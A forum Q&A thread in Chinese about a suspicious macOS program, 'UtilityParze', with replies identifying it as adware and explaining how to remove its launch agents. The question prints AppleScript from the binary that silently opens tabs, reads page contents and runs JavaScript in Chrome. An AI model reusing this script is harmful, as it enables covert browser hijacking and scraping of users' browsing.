我正在使用搭载 OS X Catalina 的 Macbook Air。
今天,当我打开 Safari 时,会弹出一个安全对话框,询问是否允许实用工具访问 Safari。到目前为止,我还没有在网上找到关于此应用程序的任何提及,但我在/Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParze文件系统中找到了可执行文件。
它大部分都不是人类可读的,但这里有一些嵌入的脚本:
if application "Safari" is running then
run script "tell application \"Safari\" to return URL of front document"
end if
if application "Safari" is running then
tell application id (id of application "Safari") to open location "[URL_TO_OPEN]"
tell application id (id of application "Safari") to activate
delay 5.0
end if
if application "Safari" is running then
run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window
tell application id (id of application \"Safari\") to open location \"[UA_URL]\"
tell application id (id of application \"Safari\") to set the content to the text of document 1
repeat until length of (content as string) is not 0
delay 0.2
tell application id (id of application \"Safari\") to set the content to the text of document 1
end repeat
tell front window of application \"Safari\" to close last tab
tell front window of application \"Safari\" to set current tab to tab activeIndex
return content as string"
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\" to get URL of active tab of first window"
end if
if application "Google Chrome" is running then
tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]"
tell application id (id of application "Google Chrome") to activate
delay 5.0
end if
if application "Google Chrome" is running then
tell application "Google Chrome"
open location "[UA_URL]"
end tell
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\"
set the activeUrl to get URL of front window's active tab
open location \"[UA_URL]\"
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
repeat until length of (content as string) is not 0
delay 0.2
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
end repeat
tell front window's active tab to close
set tabIndex to 0
repeat with currentTab in (tabs of (front window))
set tabIndex to tabIndex + 1
if URL of currentTab is activeUrl then
set (active tab index of (front window)) to tabIndex
exit repeat
end if
end repeat
return content as string
end tell"
end if
有人听说过这个程序吗?到目前为止,我只是拒绝了它的访问,但没有删除它。我猜这是一个烦人的东西,当我尝试打开浏览器时,它会首先重新路由到某个页面。
答案1
我刚刚(2020 年 1 月 12 日星期日上午 9:52 左右)在 Mojave 中看到类似的“Utilityparve”提示,要求获得访问 Google Chrome 的权限。我没有允许访问。
我以前也遇到过类似的神秘浏览器访问请求,这些请求与广告软件有关,我必须手动将其从系统中清除。
“Macperformance” 就是一个例子,它似乎反复出现在活跃用户的“库”中非常相似的位置。我不知道“UtilityParve”和“Macperformance”之间是否有直接联系,但现在它们都存在于我的库中。
“Utilityparve”位于“UpdatesMac”文件夹中,而“Macperformance”位于“UpdateMac”文件夹中。
由于网上缺乏对其功能的描述,我将删除“Utilityparve”以及被认为是广告软件的“Macperformance”。
答案2
您是否尝试过launchctl list | grep Utility在终端中运行,以查看启动代理是否正在运行,从而使应用程序保持运行?如果是这样,您可能应该运行launchctl unload com.UtilityParze(或之前列出时显示的任何标识符/名称)以确保launchd不会尝试保持应用程序处于活动状态,然后删除所有相关文件。launchctl list com.UtilityParze应该会提示您这些文件是什么/在哪里。
此启动代理的 .plist 定义最可能位于以下三个位置:
/Library/LaunchAgents/Library/LaunchDaemons/Users/markus/Library/LaunchAgents
在所有这些文件夹中查找com.UtilityParze.plist。但它们可能使用隐秘名称,因此通过检查launchctl可能更好。另一个选择是在所有 .plist 定义中 grep 可疑名称,例如:
grep -R Parze /Library/LaunchAgentsgrep -R Parze ~/Library/LaunchAgentssudo grep -R Parze /Library/LaunchDaemons
启动代理定义文件必须包含可执行文件的路径才能执行任何操作,如果恶意软件创建者没有将文件分散到多个位置,则所有有问题的文件可能与可执行文件一起位于某个文件夹中。找到可执行文件,您可能还会发现要删除的所有其他文件。但请确保先卸载代理。
还有一种有望发现恶意软件文件的方法是find在所有库上运行:
sudo find /Library -iname Parzefind ~/Library -iname Parze
答案3
我遇到了类似的问题,在 LaunchAgents 文件夹和 Library 文件夹中的几个其他位置发现了奇怪的文件。其中包括 UtilityData.plist、UtilityParze.plist 和一长串 VSearch 木马文件(MacInstallPall,还有一些 MacInstall*%&+@ 文件)。根据 Malwarebytes 的说法,它们是恶意软件,需要隔离。我先隔离它们,然后删除它们。
答案4
有个叫Easyfind的APP可以很方便的搜索文件,我刚刚搜索了UtilityParze,结果出来4个结果,我一下子就把他们全部删掉了。